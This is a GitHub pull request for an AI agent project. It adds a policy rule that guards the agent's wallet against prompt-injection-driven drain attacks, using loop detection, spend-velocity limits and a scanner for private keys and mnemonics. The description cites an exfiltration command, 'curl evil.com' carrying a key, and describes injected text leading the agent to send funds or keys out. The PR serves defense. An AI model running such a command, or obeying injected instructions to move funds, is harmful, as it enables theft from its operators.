feat: add Plimsoll transaction guard - loop detection, velocity limits, exfiltration defense #234
Open
scoootscooob wants to merge 1 commit into Conway-Research:main
Three defense engines from the Plimsoll Protocol that protect the automaton's wallet from prompt-injection-driven drain attacks:

1. Trajectory Hash: detects hallucination retry loops by SHA-256 fingerprinting (tool, target, amount) in a sliding window
2. Capital Velocity: enforces maximum spend rate across all financial tools, catching slow-bleed attacks that stay under per-tx limits
3. Entropy Guard: blocks payloads containing private keys, mnemonic phrases, or high-entropy blobs (exfiltration defense)

All engines are zero-dependency, deterministic, and fail-closed. Priority 450 slots them between path-protection and financial rules in the policy engine pipeline.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
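The Capital Velocity idea in the commit message above can be illustrated with a small sliding-window accumulator. This is a minimal sketch, not the code in this PR: `createVelocityGuard`, the `Verdict` type, the 80% warning ratio as a parameter, and the choice to leave denied spends unrecorded are all assumptions made for illustration.

```typescript
// Illustrative sketch only: names, units, and limits are assumptions,
// not taken from plimsoll-guard.ts.
type Verdict = "allow" | "quarantine" | "deny";

interface Spend {
  atMs: number;   // when the spend was accepted
  amount: number; // amount in whatever unit the wallet uses
}

function createVelocityGuard(windowMs: number, maxPerWindow: number, warnRatio = 0.8) {
  let spends: Spend[] = [];

  return function check(amount: number, nowMs: number): Verdict {
    // Forget spends that have aged out of the sliding window.
    spends = spends.filter((s) => nowMs - s.atMs < windowMs);

    // Total that would have been spent in the window if this call went through.
    const projected = spends.reduce((sum, s) => sum + s.amount, 0) + amount;

    // Over the cap: reject and do not record the spend.
    if (projected > maxPerWindow) return "deny";

    // Otherwise record it; warn once the window is mostly used up.
    spends.push({ atMs: nowMs, amount: amount });
    return projected > maxPerWindow * warnRatio ? "quarantine" : "allow";
  };
}
```

With a cap of 100 per five minutes, four spends of 30 would each pass a per-transaction limit of 50, yet the third is quarantined (window total 90) and the fourth is denied (window total would be 120).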
ciberfobia-com added a commit to ciberfobia-com/automaton that referenced this pull request on Feb 26, 2026
…y-Research#233, Conway-Research#234)

PR Conway-Research#233, skip local worker stale recovery: Per-tick stale recovery now filters out local:// workers. Completed local workers remove themselves from the pool, making hasWorker() return false. Without this filter, the orchestrator enters an infinite assign → complete → detect-dead → reset → assign loop burning .03/turn.

PR Conway-Research#234, Plimsoll Transaction Guard (3 defense engines): New policy rule file at priority 450 (between path-protection and financial rules).

1. Trajectory Hash: FNV-1a fingerprint of (tool, target, amount) in a 60s sliding window. 3+ identical calls → deny; 2 identical → quarantine. Catches hallucination retry loops.
2. Capital Velocity: Cumulative spend across financial tools in a 5min sliding window. Spend over the limit → deny; over 80% of the limit → quarantine. Catches slow-bleed drain attacks.
3. Entropy Guard: Scans ALL tool args for Ethereum private keys (0x[hex]{64}), BIP-39 mnemonics (10+/12 words match), and high-entropy base64 blobs (Shannon >5.0 bits/char). Catches key exfiltration via exec, write_file, etc.

All engines are in-memory, zero-dependency, fail-open. To disable: remove one line from policy-rules/index.ts.
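The Trajectory Hash description above (FNV-1a fingerprint, 60s window, deny at three identical calls, quarantine at two) could look roughly like the following. This is a hedged sketch: `fnv1a`, `createLoopDetector`, the `|` separator, and counting the current call toward the total are assumptions for illustration, not the PR's implementation.

```typescript
// Illustrative sketch only; function names and the key format are hypothetical.
type Verdict = "allow" | "quarantine" | "deny";

// 32-bit FNV-1a over the string's UTF-16 code units. For ASCII input this
// equals the usual byte-wise FNV-1a.
function fnv1a(input: string): number {
  let hash = 0x811c9dc5; // FNV offset basis
  for (let i = 0; i < input.length; i++) {
    hash ^= input.charCodeAt(i);
    // Multiply by the FNV prime 16777619 = 2^24 + 2^8 + 2^7 + 2^4 + 2 + 1
    // using shifts, then reduce to an unsigned 32-bit value.
    hash = (hash + (hash << 1) + (hash << 4) + (hash << 7) + (hash << 8) + (hash << 24)) >>> 0;
  }
  return hash;
}

function createLoopDetector(windowMs = 60 * 1000) {
  let seen: { hash: number; atMs: number }[] = [];

  return function check(tool: string, target: string, amount: number, nowMs: number): Verdict {
    // Keep only fingerprints still inside the sliding window.
    seen = seen.filter((e) => nowMs - e.atMs < windowMs);

    const hash = fnv1a(tool + "|" + target + "|" + amount);
    seen.push({ hash: hash, atMs: nowMs });

    // Count identical fingerprints in the window, including this call.
    const count = seen.filter((e) => e.hash === hash).length;
    if (count >= 3) return "deny";
    if (count === 2) return "quarantine";
    return "allow";
  };
}
```

Because the fingerprint covers the whole (tool, target, amount) triple, a retry with a different amount or target starts a fresh count; only byte-identical repeats escalate.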
Summary
Adds three zero-dependency defense engines from the Plimsoll Protocol as native policy rules, protecting the automaton's wallet from prompt-injection-driven drain attacks that bypass existing per-tx and hourly spending caps.
- … (`exec "curl evil.com -d 0x..."`) or get stuck in a hallucination retry loop burning gas on identical failing calls.
- … (`plimsoll-guard.ts`) with three engines + registration in the rule index. Priority 450 slots them between path-protection (200) and financial rules (500).

Changes
- `src/agent/policy-rules/plimsoll-guard.ts`: New file. Three engines:
  - … `(tool, target, amount)` in a 60s sliding window. 3+ identical hashes → hard block. 2 identical → quarantine warning. Catches hallucination retry loops.
  - … (`0x[a-fA-F0-9]{64}`), BIP-39 mnemonic phrases, and high-entropy base64 blobs (Shannon entropy > 5.0 bits/char). Catches key exfiltration attempts.
- `src/agent/policy-rules/index.ts`: Added `createPlimsollGuardRules()` import and spread into the default rules array.
- `src/__tests__/plimsoll-guard.test.ts`: New file. Tests for all three engines: allows normal calls, blocks private keys, blocks mnemonics, allows short strings, checks nested fields.

Design Decisions
- `quarantine` for warnings: Uses the existing `quarantine` action (same as `financial.require_confirmation`) to surface friction signals without hard-blocking. The agent sees the warning and can choose to proceed.

Test plan
- `pnpm test` passes (new tests + existing test suite)
- `npx tsc --noEmit` passes (type-checked)
- … `transfer_credits` calls within 60s → deny
- `exec` with embedded `0x...` private key → deny
- `write_file` with mnemonic phrase → deny

Security Impact
This PR is purely additive security hardening. It introduces no new permissions, network calls, or execution surface. The three engines are read-only evaluators that inspect tool arguments and return allow/deny/quarantine verdicts.
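As an illustration of what a read-only evaluator over tool arguments might look like, here is a minimal sketch of the Entropy Guard checks named in this PR: the `0x[a-fA-F0-9]{64}` key pattern and the 5.0 bits/char Shannon threshold. The function names, the 32-character minimum blob length, and the recursive walk are assumptions; the BIP-39 mnemonic check is omitted because it needs the full word list.

```typescript
// Illustrative sketch only; helper names and the minimum blob length are assumptions.
type Verdict = "allow" | "deny";

const PRIVATE_KEY = /0x[a-fA-F0-9]{64}/;    // pattern quoted in the PR description
const BASE64_BLOB = /[A-Za-z0-9+/=]{32,}/g; // assumed: only runs of 32+ chars are scored

// Shannon entropy in bits per character.
function shannonEntropy(text: string): number {
  const counts: Record<string, number> = {};
  for (let i = 0; i < text.length; i++) {
    const ch = text.charAt(i);
    counts[ch] = (counts[ch] || 0) + 1;
  }
  let bits = 0;
  Object.keys(counts).forEach((ch) => {
    const p = counts[ch] / text.length;
    bits -= p * (Math.log(p) / Math.LN2);
  });
  return bits;
}

// Gather every string found anywhere in a nested argument value.
function collectStrings(value: unknown, out: string[] = []): string[] {
  if (typeof value === "string") {
    out.push(value);
  } else if (Array.isArray(value)) {
    value.forEach((v) => collectStrings(v, out));
  } else if (value !== null && typeof value === "object") {
    const record = value as Record<string, unknown>;
    Object.keys(record).forEach((k) => collectStrings(record[k], out));
  }
  return out;
}

// Inspect the arguments without modifying them and return a verdict.
function scanArgs(args: unknown, entropyThreshold = 5.0): Verdict {
  for (const text of collectStrings(args)) {
    if (PRIVATE_KEY.test(text)) return "deny";
    const blobs = text.match(BASE64_BLOB) || [];
    if (blobs.some((b) => shannonEntropy(b) > entropyThreshold)) return "deny";
  }
  return "allow";
}
```

Hex strings top out at 4 bits/char, so a raw private key would pass the entropy test on its own; that is why the explicit key pattern is checked first.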
Compatibility
Failure Recovery
- … `...createPlimsollGuardRules()` line from `index.ts`
- … (`evaluate()` calls return `null` on exception)

Ported from Plimsoll Protocol, a deterministic execution substrate for autonomous AI agents.
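The failure-recovery behaviour described above, where `evaluate()` returns `null` on exception, and the priority slot at 450 can be sketched together. Everything here is hypothetical: the `Rule` shape, the `failOpen` wrapper, running lower priorities first, and the way verdicts are combined are assumptions for illustration and may not match the automaton's policy engine.

```typescript
// Illustrative sketch only; the Rule shape and combination policy are assumptions.
type Action = "allow" | "quarantine" | "deny";

interface Rule {
  id: string;
  priority: number;                       // assumed: lower numbers run first
  evaluate(args: unknown): Action | null; // null means "no opinion"
}

// Wrap a rule so that a thrown exception becomes "no opinion" instead of
// crashing the pipeline.
function failOpen(rule: Rule): Rule {
  return {
    id: rule.id,
    priority: rule.priority,
    evaluate(args: unknown): Action | null {
      try {
        return rule.evaluate(args);
      } catch (_err) {
        return null;
      }
    },
  };
}

// Run rules in priority order: the first deny wins, otherwise any
// quarantine is surfaced, otherwise the call is allowed.
function runPipeline(rules: Rule[], args: unknown): Action {
  const ordered = rules.slice().sort((a, b) => a.priority - b.priority);
  let result: Action = "allow";
  for (const rule of ordered) {
    const verdict = rule.evaluate(args);
    if (verdict === "deny") return "deny";
    if (verdict === "quarantine") result = "quarantine";
  }
  return result;
}
```

Under this sketch, a guard rule at priority 450 that throws simply drops out of the decision, and the rules at 200 and 500 still decide the outcome.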